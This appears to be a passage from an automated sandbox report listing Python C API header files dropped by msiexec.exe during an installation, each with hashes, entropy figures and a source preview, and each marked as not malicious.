                                                                                                                                MD5:25323AEB13715727863E4B5D175894C3
                                                                                                                                SHA1:B914206B4BCCA2DC08B2A0DA31BAA897B35F393C
                                                                                                                                SHA-256:5397C8F2500B77AD6A77A3C1B9BAE879E866E07438777E3C8EB799211F1F506A
                                                                                                                                SHA-512:45F3435AA78C10784F444FCBC83EE417FB99F5C6C8E039E2A6D550F0F913E13EB2E3BD3A7C468F8F6A0C8925A0852FC4BD61A22A99BFF140F37CB489DC2A7C67
                                                                                                                                Malicious:false
                                                                                                                                Preview:// Symbols and macros to supply platform-independent interfaces to mathematical..// functions and constants.....#ifndef Py_PYMATH_H..#define Py_PYMATH_H..../* High precision definition of pi and e (Euler).. * The values are taken from libc6's math.h... */..#ifndef Py_MATH_PIl..#define Py_MATH_PIl 3.1415926535897932384626433832795029L..#endif..#ifndef Py_MATH_PI..#define Py_MATH_PI 3.14159265358979323846..#endif....#ifndef Py_MATH_El..#define Py_MATH_El 2.7182818284590452353602874713526625L..#endif....#ifndef Py_MATH_E..#define Py_MATH_E 2.7182818284590452354..#endif..../* Tau (2pi) to 40 digits, taken from tauday.com/tau-digits. */..#ifndef Py_MATH_TAU..#define Py_MATH_TAU 6.2831853071795864769252867665590057683943L..#endif....// Py_IS_NAN(X)..// Return 1 if float or double arg is a NaN, else 0...#define Py_IS_NAN(X) isnan(X)....// Py_IS_INFINITY(X)..// Return 1 if float or double arg is an infinity, else 0...#define Py_IS_INFINITY(X) isinf(X)....// Py_IS_FINITE(X)..// Return 1 if floa
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3994
                                                                                                                                Entropy (8bit):4.953367411301275
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:Yscrdb8tCUPD693/9vHcXRu+nj0Wpk2VYjsZdQ+L5:DC/99uor2VpZLL5
                                                                                                                                MD5:39D923BE03922235B3D2CD3F81534937
                                                                                                                                SHA1:EC42212595725375A3F335D5B95C1B6956B4EEAF
                                                                                                                                SHA-256:1A785D08CA1AEC12B33473B52FB3C5AEFB238664021008D1793386A51EEC10BE
                                                                                                                                SHA-512:3F1950150414B87ED7D839E77F8A48ED9494AA06855D12F0F180D34C8A19DD20AB938AD8A122DC6A5307F5C0081AE335377D1065CF5939812E6DC9ACC9BAFA94
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* The PyMem_ family: low-level memory allocation interfaces... See objimpl.h for the PyObject_ memory family...*/....#ifndef Py_PYMEM_H..#define Py_PYMEM_H....#include "pyport.h"....#ifdef __cplusplus..extern "C" {..#endif..../* BEWARE:.... Each interface exports both functions and macros. Extension modules should.. use the functions, to ensure binary compatibility across Python versions... Because the Python implementation is free to change internal details, and.. the macros may (or may not) expose details for speed, if you do use the.. macros you must recompile your extensions with each Python release..... Never mix calls to PyMem_ with calls to the platform malloc/realloc/.. calloc/free. For example, on Windows different DLLs may end up using.. different heaps, and if you use PyMem_Malloc you'll get the memory from the.. heap used by the Python DLL; it could be a disaster if you free()'ed that.. directly in your own extension. Using PyMem_Free instead ensu
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25270
                                                                                                                                Entropy (8bit):5.276917685379087
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:Y9+HZZw3+OYU0L9N8Idij8/sDu8+dz8c8pU6z78pUxMy5b/ENWqd907Q3iF8Z8hl:7YBYF9NPi4/Un/0acNWSmhdxvBFt
                                                                                                                                MD5:F1F525BBC0C1356B04DDCB723C665DBB
                                                                                                                                SHA1:5439A3EE0AB6DBDDB7887B577C4529DFF72DAF72
                                                                                                                                SHA-256:31469D32716DD9660D5FF64AEF2E51881C28ED348CC41D9E97FCA1CD80A127B2
                                                                                                                                SHA-512:FF371EB9E953158B06B96CBB7B2772C408A8E4202E17F55E754AEF187295345E464B46B8E1AD1DA0E1C76A2F86CEAD5331E62D289AF0CC42D10354134B2AFA34
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_PYPORT_H..#define Py_PYPORT_H....#include "pyconfig.h" /* include for defines */....#include <inttypes.h>....#include <limits.h>..#ifndef UCHAR_MAX..# error "limits.h must define UCHAR_MAX"..#endif..#if UCHAR_MAX != 255..# error "Python's source code assumes C's unsigned char is an 8-bit type"..#endif......// Macro to use C++ static_cast<> in the Python C API...#ifdef __cplusplus..# define _Py_STATIC_CAST(type, expr) static_cast<type>(expr)..#else..# define _Py_STATIC_CAST(type, expr) ((type)(expr))..#endif..// Macro to use the more powerful/dangerous C-style cast even in C++...#define _Py_CAST(type, expr) ((type)(expr))....// Static inline functions should use _Py_NULL rather than using directly NULL..// to prevent C++ compiler warnings. On C++11 and newer, _Py_NULL is defined as..// nullptr...#if defined(__cplusplus) && __cplusplus >= 201103..# define _Py_NULL nullptr..#else..# define _Py_NULL NULL..#endif....../* Defines to build Python and its standard library:.. *
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4767
                                                                                                                                Entropy (8bit):5.128059952751942
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:EKvuYsaF1vT5TVwhRHoQghMY9/ZpVj2uaQ:EZYVBwhRHo1ZHLyjQ
                                                                                                                                MD5:E20443B4C352780306EC4BD658B100CC
                                                                                                                                SHA1:53C1EBFAB0EFC902E3507D0CB88E570B69C5D0F7
                                                                                                                                SHA-256:811143ADE21A7C02DE7AEADF524FA06F31B5BABF8344CE32F657546A3CF93825
                                                                                                                                SHA-512:F5817BD4FE4060D14DFE324E80D5028A244672D1B6EAB5A7A72D36DE89194184D11409270DAD921DFB078BF8C8102A141ECCC041932AD2CE3687300682272AEB
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Thread and interpreter state structures and their interfaces */......#ifndef Py_PYSTATE_H..#define Py_PYSTATE_H..#ifdef __cplusplus..extern "C" {..#endif..../* This limitation is for performance and simplicity. If needed it can be..removed (with effort). */..#define MAX_CO_EXTRA_USERS 255....PyAPI_FUNC(PyInterpreterState *) PyInterpreterState_New(void);..PyAPI_FUNC(void) PyInterpreterState_Clear(PyInterpreterState *);..PyAPI_FUNC(void) PyInterpreterState_Delete(PyInterpreterState *);....#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03090000../* New in 3.9 */../* Get the current interpreter state..... Issue a fatal error if there no current Python thread state or no current.. interpreter. It cannot return NULL..... The caller must hold the GIL. */..PyAPI_FUNC(PyInterpreterState *) PyInterpreterState_Get(void);..#endif....#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03080000../* New in 3.8 */..PyAPI_FUNC(PyObject *) PyInterpreterState_GetDict(PyInterpreterState
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):459
                                                                                                                                Entropy (8bit):5.022153673289837
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:BboAEURhrTlQSj7yADv9Ne/9wADveWBov:BdEUf+Sj7PvLMrve3v
                                                                                                                                MD5:1D69651494533AA0FB597A48341CE0C8
                                                                                                                                SHA1:65AD7F6BB55774DEEEF734BD90D0739CBE8D19C7
                                                                                                                                SHA-256:2DD23B6FB3B7A7FEF62B33170A7215F0B68F2CDD6EDBA5548D0D563C5B124055
                                                                                                                                SHA-512:7A51EA3CACEAD1C3752F8F861C9E62300B3CE4B0690ADEBA4264CE5B9C420B1611652959CC88C7A0F788713B7E2D63584157243FEE9B1A0AAC9873B226EF222F
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_STRCMP_H..#define Py_STRCMP_H....#ifdef __cplusplus..extern "C" {..#endif....PyAPI_FUNC(int) PyOS_mystrnicmp(const char *, const char *, Py_ssize_t);..PyAPI_FUNC(int) PyOS_mystricmp(const char *, const char *);....#ifdef MS_WINDOWS..#define PyOS_strnicmp strnicmp..#define PyOS_stricmp stricmp..#else..#define PyOS_strnicmp PyOS_mystrnicmp..#define PyOS_stricmp PyOS_mystricmp..#endif....#ifdef __cplusplus..}..#endif....#endif /* !Py_STRCMP_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1603
                                                                                                                                Entropy (8bit):4.715096402574982
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:BGERvPSJV7dNnZzcuoNlrNPdl7j08+PiE4K3AaltRNOv:B/RPSJbNnINtxdl7jh+P+FalQv
                                                                                                                                MD5:DEE296E06D6F0CC4BAC9258EFAD19D1A
                                                                                                                                SHA1:99EC0B64E54751EA70ACC013FB1B259DA8CBF3BC
                                                                                                                                SHA-256:CC01DB06C999E075BF5A2E4DB6DDACEB1BB5BAFE201DCBD39C6969A37C29213C
                                                                                                                                SHA-512:496F1D0A9C9BE9B0404C5C351D966550EE5C67E6B48CCE625D807D6991733D45075BD30D9A6E50C03EDE3EFE3424BCF5F84EF1CD452EDFA6167B22ED7FAD3910
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_STRTOD_H..#define Py_STRTOD_H....#ifdef __cplusplus..extern "C" {..#endif......PyAPI_FUNC(double) PyOS_string_to_double(const char *str,.. char **endptr,.. PyObject *overflow_exception);..../* The caller is responsible for calling PyMem_Free to free the buffer.. that's is returned. */..PyAPI_FUNC(char *) PyOS_double_to_string(double val,.. char format_code,.. int precision,.. int flags,.. int *type);....#ifndef Py_LIMITED_API..PyAPI_FUNC(PyObject *) _Py_string_to_number_with_underscores(.. const char *str, Py_ssize_t len, const char *what, PyObject *obj, void *arg,.. PyObject *(*innerfunc)(const char *, Py_ssize_t, void *));....PyAPI_FUNC(double) _Py_parse_inf_or_nan(const char *p, char **endptr);..#endif....../* PyOS_double_to_str
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1234
                                                                                                                                Entropy (8bit):5.441321686989825
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:wizJxGBA0GN+JBn7nj+WKwEMLrDUHov6id4JIkcwtxOl+G5hGzQu:3FxWVc+JZ76WKISoN0qUSh/u
                                                                                                                                MD5:CAFC1901BD2AFEE7DAF75E0E6F9299E3
                                                                                                                                SHA1:2D39A7035C6E3B04EDD84191931B8745E7AF76AF
                                                                                                                                SHA-256:863E6F97F46EB481686178FDE89FE5B365BD31FE82F30157538A84668B3C7536
                                                                                                                                SHA-512:6AF56A5981061C42F2AF7C9E14AE9875D36B62D5C53E213C0F9DA6CEB76C61A3534F31CE81FF2254D7EB062DF187AA6BD9CFDB9C1E1F302B9F7EEE9E646DA495
                                                                                                                                Malicious:false
                                                                                                                                Preview:../* Interfaces to parse and execute pieces of python code */....#ifndef Py_PYTHONRUN_H..#define Py_PYTHONRUN_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_FUNC(PyObject *) Py_CompileString(const char *, const char *, int);....PyAPI_FUNC(void) PyErr_Print(void);..PyAPI_FUNC(void) PyErr_PrintEx(int);..PyAPI_FUNC(void) PyErr_Display(PyObject *, PyObject *, PyObject *);....../* Stuff with no proper home (yet) */..PyAPI_DATA(int) (*PyOS_InputHook)(void);..../* Stack size, in "pointers" (so we get extra safety margins.. on 64-bit platforms). On a 32-bit platform, this translates.. to an 8k margin. */..#define PYOS_STACK_MARGIN 2048....#if defined(WIN32) && !defined(MS_WIN64) && !defined(_M_ARM) && defined(_MSC_VER) && _MSC_VER >= 1300../* Enable stack checking under Microsoft C */..// When changing the platforms, ensure PyOS_CheckStack() docs are still correct..#define USE_STACKCHECK..#endif....#ifdef USE_STACKCHECK../* Check that we aren't overflowing our stack */..PyAPI_FUNC(i
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4966
                                                                                                                                Entropy (8bit):5.297620967684425
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:wV1qxKfyLViwffa2ETs7fUbD3uJeiXV26G6tj2MZPlMRRkrYkxlyBNkZov:TOyLViwffaWCbuUiX/tVPlM+oiZov
                                                                                                                                MD5:FFF1235A6879D8200E2032C5FF20FE89
                                                                                                                                SHA1:4E02382A9F8FB05E0669646D817A24FA402D8528
                                                                                                                                SHA-256:B59AF5650FB1ECB46B59D7374188BFF3E7037398C3A1DB339EB15DAB2369B43D
                                                                                                                                SHA-512:D6B4AE755CEA1B9B3E34EC36242FCF7BD1BFC4113C0E0DA119DA7E696F6D4C40B61AE69DA95B770A3F6E82FF45CCB99EBF3FCAF58B9C149E978D464796E87CDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_PYTHREAD_H..#define Py_PYTHREAD_H....typedef void *PyThread_type_lock;....#ifdef __cplusplus..extern "C" {..#endif..../* Return status codes for Python lock acquisition. Chosen for maximum.. * backwards compatibility, ie failure -> 0, success -> 1. */..typedef enum PyLockStatus {.. PY_LOCK_FAILURE = 0,.. PY_LOCK_ACQUIRED = 1,.. PY_LOCK_INTR..} PyLockStatus;....PyAPI_FUNC(void) PyThread_init_thread(void);..PyAPI_FUNC(unsigned long) PyThread_start_new_thread(void (*)(void *), void *);..PyAPI_FUNC(void) _Py_NO_RETURN PyThread_exit_thread(void);..PyAPI_FUNC(unsigned long) PyThread_get_thread_ident(void);....#if defined(__APPLE__) || defined(__linux__) || defined(__FreeBSD__) || defined(__OpenBSD__) || defined(__NetBSD__) || defined(_WIN32) || defined(_AIX)..#define PY_HAVE_THREAD_NATIVE_ID..PyAPI_FUNC(unsigned long) PyThread_get_thread_native_id(void);..#endif....PyAPI_FUNC(PyThread_type_lock) PyThread_allocate_lock(void);..PyAPI_FUNC(void) PyThread_free_lock(PyThread
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):881
                                                                                                                                Entropy (8bit):4.832281870825026
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:0Wy9Vax/Q/7xZxuShx8KtKWx9x0PjxJTxhx5xPxnx5xl5:ZWUx/sPtb4Q70PlJV3v5xvl5
                                                                                                                                MD5:E418FB47E9CBF1EDBF3D27091520D3D6
                                                                                                                                SHA1:BC5CEA031F9ADF17480C5D81E41AFB1D38262195
                                                                                                                                SHA-256:CFE86E7DFF6E86B1F0C81991DB870D31FD5E38E3C7FDC7E898BD908876B38029
                                                                                                                                SHA-512:F6A065D2512FD903FA06CFAFF8341D86B31988B10091F4D65EB0F90B483ACE866B69A83BB42FA9D8C669C65C0317DE64106515A1BA1B704A04D8D589D9944EB3
                                                                                                                                Malicious:false
                                                                                                                                Preview:// Forward declarations of types of the Python C API...// Declare them at the same place since redefining typedef is a C11 feature...// Only use a forward declaration if there is an interdependency between two..// header files.....#ifndef Py_PYTYPEDEFS_H..#define Py_PYTYPEDEFS_H..#ifdef __cplusplus..extern "C" {..#endif....typedef struct PyModuleDef PyModuleDef;..typedef struct PyModuleDef_Slot PyModuleDef_Slot;..typedef struct PyMethodDef PyMethodDef;..typedef struct PyGetSetDef PyGetSetDef;..typedef struct PyMemberDef PyMemberDef;....typedef struct _object PyObject;..typedef struct _longobject PyLongObject;..typedef struct _typeobject PyTypeObject;..typedef struct PyCodeObject PyCodeObject;..typedef struct _frame PyFrameObject;....typedef struct _ts PyThreadState;..typedef struct _is PyInterpreterState;....#ifdef __cplusplus..}..#endif..#endif // !Py_PYTYPEDEFS_H..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):655
                                                                                                                                Entropy (8bit):5.136463151086606
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:CwYNmrVceqg9ZdOK8vFRt+bREsDwYySNM5jwF9Rm64vKpzXIiql:dYN6cej6Rt+usDwYySNM5sF9QvqzX3ql
                                                                                                                                MD5:737E5C0DA8D24785599C2F3BFAE9A60D
                                                                                                                                SHA1:DF5B3FD21556F15B5A85DAB088DA34EA698B4F35
                                                                                                                                SHA-256:A0F3408C62F05650BA9E457CBB340A12B267D2A5CD94B000092A7E62EA21FC9D
                                                                                                                                SHA-512:DC766E605C477A2AB24F604AC68175EB8D809535AFCAAF0CAF8B09EB9901377098467E36C4DDC850AF4F67A4E3AA3DBB1A0FB90BFD4921DA753F5A98F511030C
                                                                                                                                Malicious:false
                                                                                                                                Preview:../* Range object interface */....#ifndef Py_RANGEOBJECT_H..#define Py_RANGEOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../*..A range object represents an integer range. This is an immutable object;..a range cannot change its value after creation.....Range objects behave like the corresponding tuple objects except that..they are represented by a start, stop, and step datamembers...*/....PyAPI_DATA(PyTypeObject) PyRange_Type;..PyAPI_DATA(PyTypeObject) PyRangeIter_Type;..PyAPI_DATA(PyTypeObject) PyLongRangeIter_Type;....#define PyRange_Check(op) Py_IS_TYPE(op, &PyRange_Type)....#ifdef __cplusplus..}..#endif..#endif /* !Py_RANGEOBJECT_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1592
                                                                                                                                Entropy (8bit):5.136442862132236
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:Ta9cZyvwRADV7QEg3w9d3wecMwtU343wS343wecMfcMwtHY33cMwzrnIZNl:O9YyvwRADqEL96JoA1nrnIrl
                                                                                                                                MD5:78B01AC6AE88EECDA8A41B5C770F1769
                                                                                                                                SHA1:67B8ACFF5D286340198173E79BB05552F6ABF047
                                                                                                                                SHA-256:FE74C34017B6BD90D220FA45C99D3684C90B32A138EA3D28D576DA2226731978
                                                                                                                                SHA-512:2032ECF93D0B5B2A3D8FE8D6AE79451675243FC9D3474DD627285E16F56DA5263E3D4B11296EFD646BEF2CB2466DE65C14A31A06D8E9629E37CFF581D5DB8A0C
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Set object interface */....#ifndef Py_SETOBJECT_H..#define Py_SETOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PySet_Type;..PyAPI_DATA(PyTypeObject) PyFrozenSet_Type;..PyAPI_DATA(PyTypeObject) PySetIter_Type;....PyAPI_FUNC(PyObject *) PySet_New(PyObject *);..PyAPI_FUNC(PyObject *) PyFrozenSet_New(PyObject *);....PyAPI_FUNC(int) PySet_Add(PyObject *set, PyObject *key);..PyAPI_FUNC(int) PySet_Clear(PyObject *set);..PyAPI_FUNC(int) PySet_Contains(PyObject *anyset, PyObject *key);..PyAPI_FUNC(int) PySet_Discard(PyObject *set, PyObject *key);..PyAPI_FUNC(PyObject *) PySet_Pop(PyObject *set);..PyAPI_FUNC(Py_ssize_t) PySet_Size(PyObject *anyset);....#define PyFrozenSet_CheckExact(ob) Py_IS_TYPE(ob, &PyFrozenSet_Type)..#define PyFrozenSet_Check(ob) \.. (Py_IS_TYPE(ob, &PyFrozenSet_Type) || \.. PyType_IsSubtype(Py_TYPE(ob), &PyFrozenSet_Type))....#define PyAnySet_CheckExact(ob) \.. (Py_IS_TYPE(ob, &PySet_Type) || Py_IS_TYPE(ob, &PyFrozenSet_Type)).
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2581
                                                                                                                                Entropy (8bit):4.822166781684486
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:K2TTR2znlKM0H0NP0QRbuSdV+tcdAi8cttkN:ulK/4xekjG
                                                                                                                                MD5:C15FB702F7D4659132E39447A8C93FDB
                                                                                                                                SHA1:3943BD287720F5B91839F7FAE36524C8A5714D48
                                                                                                                                SHA-256:0329927AD9E0BB1386FA1C72A28BA0898C9DA320C8A3A5C9A234B8D06823B060
                                                                                                                                SHA-512:6C3D09D0A437DB235EB3191F970AE3D773C101B62B87A73F81C050B0496FD031CA6B944CC3F16DABEE340CA507C118278E915527B7247B06119BE9D07F6F28C7
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_SLICEOBJECT_H..#define Py_SLICEOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../* The unique ellipsis object "..." */....PyAPI_DATA(PyObject) _Py_EllipsisObject; /* Don't use this directly */....#define Py_Ellipsis (&_Py_EllipsisObject)..../* Slice object interface */..../*....A slice object containing start, stop, and step data members (the..names are from range). After much talk with Guido, it was decided to..let these be any arbitrary python type. Py_None stands for omitted values...*/..#ifndef Py_LIMITED_API..typedef struct {.. PyObject_HEAD.. PyObject *start, *stop, *step; /* not NULL */..} PySliceObject;..#endif....PyAPI_DATA(PyTypeObject) PySlice_Type;..PyAPI_DATA(PyTypeObject) PyEllipsis_Type;....#define PySlice_Check(op) Py_IS_TYPE(op, &PySlice_Type)....PyAPI_FUNC(PyObject *) PySlice_New(PyObject* start, PyObject* stop,.. PyObject* step);..#ifndef Py_LIMITED_API..PyAPI_FUNC(PyObject *) _PySlice_FromIndices(Py_ssize
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2115
                                                                                                                                Entropy (8bit):5.031521253073526
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:BGDFGDUQHt7GS1l73kY/rbDHKouTjoUQYSmRD9:MglHt7GS1xUgnNuFQYSml9
                                                                                                                                MD5:3DE6FC9EA265FDF141AE8A13A720B7CA
                                                                                                                                SHA1:AB421C5507B91BFADA999EEDC95F585DD547F9C0
                                                                                                                                SHA-256:3399E0FA1F86B767A6231576398AF6EE6BE61E7B95F8B018160C6586BE93A703
                                                                                                                                SHA-512:1BEC3551C1BAFDA8F28C87846A40D1539004563CAFE172946B04A85755790A8E4D3AF7F7F4271D57C210768239AAB59BC1C1280CD8A080137AFBC3E57E3613FA
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_STRUCTMEMBER_H..#define Py_STRUCTMEMBER_H..#ifdef __cplusplus..extern "C" {..#endif....../* Interface to map C struct members to Python object attributes */....#include <stddef.h> /* For offsetof */..../* An array of PyMemberDef structures defines the name, type and offset.. of selected members of a C structure. These can be read by.. PyMember_GetOne() and set by PyMember_SetOne() (except if their READONLY.. flag is set). The array must be terminated with an entry whose name.. pointer is NULL. */....struct PyMemberDef {.. const char *name;.. int type;.. Py_ssize_t offset;.. int flags;.. const char *doc;..};..../* Types */..#define T_SHORT 0..#define T_INT 1..#define T_LONG 2..#define T_FLOAT 3..#define T_DOUBLE 4..#define T_STRING 5..#define T_OBJECT 6../* XXX the ordering here is weird for binary compatibility */..#define T_CHAR 7 /* 1-character string */..#define T_BYTE 8 /* 8-bit signed int */../* unsigned
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1437
                                                                                                                                Entropy (8bit):5.007914961335598
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:6A4EvxJxytxZGRULiR5tzf59zmM2YzCCShSnbYSncJYSntOnYS2YStRCenWeTo:6ApZ6YyMXfnmM5zmMYccJYcAYbYgCaWz
                                                                                                                                MD5:447683336565D1CAE310AF1F2D98D8D9
                                                                                                                                SHA1:57E0BAA37FED0F88F888A3FA5F2F19D93CFB0FCF
                                                                                                                                SHA-256:17B61611BFDA33203D9596F33B29A16DFAB4C4122E6375DC39F648DFD5693097
                                                                                                                                SHA-512:E0EA03F0F021770BEF34366E6AE8E9AD82198FB2DF2CE6CD86D80CACF826392ED20566694CBF04BE6AC812E4CC0036487E509221B1337640DB99C636637910DF
                                                                                                                                Malicious:false
                                                                                                                                Preview:../* Named tuple object interface */....#ifndef Py_STRUCTSEQ_H..#define Py_STRUCTSEQ_H..#ifdef __cplusplus..extern "C" {..#endif....typedef struct PyStructSequence_Field {.. const char *name;.. const char *doc;..} PyStructSequence_Field;....typedef struct PyStructSequence_Desc {.. const char *name;.. const char *doc;.. PyStructSequence_Field *fields;.. int n_in_sequence;..} PyStructSequence_Desc;....PyAPI_DATA(const char * const) PyStructSequence_UnnamedField;....#ifndef Py_LIMITED_API..PyAPI_FUNC(void) PyStructSequence_InitType(PyTypeObject *type,.. PyStructSequence_Desc *desc);..PyAPI_FUNC(int) PyStructSequence_InitType2(PyTypeObject *type,.. PyStructSequence_Desc *desc);..#endif..PyAPI_FUNC(PyTypeObject*) PyStructSequence_NewType(PyStructSequence_Desc *desc);....PyAPI_FUNC(PyObject *) PyStructSequence_New(PyTypeObject* type);....#ifndef Py_LIMITED_API..typedef PyTupleObject PyStruct
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1422
                                                                                                                                Entropy (8bit):5.4118397487055825
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:QfNnHc+fl+YLfN++BqzZvWtRZvWtvORvaX+5+EGsP6+H7OtD:eHcolhLfN+jzZuZSO1mo5Gsi2c
                                                                                                                                MD5:C7B0FAEE279E3B66502F8B3F567D7D9E
                                                                                                                                SHA1:C1CDE714B60F3F6FD538B12BEC47F331F593151F
                                                                                                                                SHA-256:CFE187A330A6674B0CF51154C194486BE33AA5D1EA674A5159FF8164F5ECC948
                                                                                                                                SHA-512:B7EB2A68610DF6CDC1B4F8333E077027BA6ACBBFD11CF7E6D6EA5FC5D3A0DDAAE45D5D0951351DC42C218564199AD529BADFC8767A2D38BA94CF897C4AFA2724
                                                                                                                                Malicious:false
                                                                                                                                Preview:../* System module interface */....#ifndef Py_SYSMODULE_H..#define Py_SYSMODULE_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_FUNC(PyObject *) PySys_GetObject(const char *);..PyAPI_FUNC(int) PySys_SetObject(const char *, PyObject *);....Py_DEPRECATED(3.11) PyAPI_FUNC(void) PySys_SetArgv(int, wchar_t **);..Py_DEPRECATED(3.11) PyAPI_FUNC(void) PySys_SetArgvEx(int, wchar_t **, int);..Py_DEPRECATED(3.11) PyAPI_FUNC(void) PySys_SetPath(const wchar_t *);....PyAPI_FUNC(void) PySys_WriteStdout(const char *format, ...).. Py_GCC_ATTRIBUTE((format(printf, 1, 2)));..PyAPI_FUNC(void) PySys_WriteStderr(const char *format, ...).. Py_GCC_ATTRIBUTE((format(printf, 1, 2)));..PyAPI_FUNC(void) PySys_FormatStdout(const char *format, ...);..PyAPI_FUNC(void) PySys_FormatStderr(const char *format, ...);....PyAPI_FUNC(void) PySys_ResetWarnOptions(void);..Py_DEPRECATED(3.11) PyAPI_FUNC(void) PySys_AddWarnOption(const wchar_t *);..Py_DEPRECATED(3.11) PyAPI_FUNC(void) PySys_
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2766
                                                                                                                                Entropy (8bit):4.689520994828043
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:bVrSpEL3Zv0ffp1xYqwAJS1hPzbU6JwzGOZhFfFokoWYHPz+Q:usd86aJmLbU6GjFw71
                                                                                                                                MD5:858C753EA3CBEF68D1792EF88C115E5F
                                                                                                                                SHA1:6E505DC68FFC18465F841127DF6C54DCFB8C8DAB
                                                                                                                                SHA-256:ED81122AF1C472DBE825D5A03CF2CB69B14B6FE4D76B5F15A2B88FE9F5239560
                                                                                                                                SHA-512:4C9FDB22AD343215B54922B0B63C2310EC7A9705CA9D2D021EB3FE9FC76D993AA12F031930B5DEEEF0F672BA65ADEC824158F4C5DA0B0655F4F52C578DE5DFCD
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Auto-generated by Tools/scripts/generate_token.py */..../* Token types */..#ifndef Py_LIMITED_API..#ifndef Py_TOKEN_H..#define Py_TOKEN_H..#ifdef __cplusplus..extern "C" {..#endif....#undef TILDE /* Prevent clash of our definition with system macro. Ex AIX, ioctl.h */....#define ENDMARKER 0..#define NAME 1..#define NUMBER 2..#define STRING 3..#define NEWLINE 4..#define INDENT 5..#define DEDENT 6..#define LPAR 7..#define RPAR 8..#define LSQB 9..#define RSQB 10..#define COLON 11..#define COMMA 12..#define SEMI 13..#define PLUS 14..#define MINUS 15..#define STAR 16..#define SLASH 17..#define VBAR 18..#define AMPER 19..#define LESS 20..#define GREATER 21..#define EQUAL 22..#define DOT 23..#define PERCENT 24..#define LBRACE 25..#defi
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):609
                                                                                                                                Entropy (8bit):5.246555902299617
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:BaJlVsYoRBTRBHilSLFBbbILW/+1rCJ7KvcN2LYBdJ2:wJbsLBdBHilmFBbb5/RsLY12
                                                                                                                                MD5:00AAA07A9F0BBD6965E49D53621A3CB7
